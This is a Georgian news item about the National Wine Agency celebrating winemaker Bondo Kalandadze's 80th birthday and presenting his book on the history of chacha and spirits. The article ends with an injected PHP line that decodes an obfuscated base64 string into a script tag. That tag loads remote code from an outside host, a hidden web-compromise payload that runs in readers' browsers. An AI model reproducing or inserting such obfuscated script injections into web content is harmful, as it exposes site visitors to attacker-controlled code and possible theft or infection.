celsiusi
ავერსი შნაიდერი
ღვინის ეროვნულ სააგენტოში საქართველოს დამსახურებული მეღვინის, ბონდო კალანდაძის 80 წლის იუბილე და მისი წიგნის „ჭაჭის, ყურძნის არყის და სპირტის ისტორია“ პრეზენტაცია გაიმართა. 
 
ღვინის ეროვნული სააგენტოს ინფორმაციით, ალკოჰოლური სასმელების სპეციალისტი, ექსპერტ-კონსულტანტი ბონდო კალანდაძე 50 წელზე მეტია მოღვაწეობს მეღვინეობის სფეროში. მან შექმნა მაგარი ალკოჰოლური სასმელებისა და ლიქიორ-არყების 70-ზე მეტი რეცეპტურა. მონაწილოება აქვს მიღებული მსოფლიოს 60 ქვეყანაში გამართულ საერთაშორისო დეგუსტაციებში, გამოფენებში, კონფერენციასა და კონკურსებში. ბონდო კალანდაძე არის მევენახეობა-მეღვინეობის საერთაშორისო აკადემიის ნამდვილი წევრი, ამერიკის ქალაქ ნიუ-ორლეანის საპატიო მოქალაქე, მევენახეობა-მეღვინეობის ისტორიასა და დარგის სპეციალისტებზე გამოქვეყნებული აქვს 16 წიგნი.
 
 
დამსახურებულ მეღვინეს 80 წლის იუბილე ღვინის ეროვნული სააგენტოს თავმჯდომარემ, ლევან მეხუზლამ და მეღვინეობის დარგის წარმომადგენლებმა მიულოცეს.
 
 
755
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");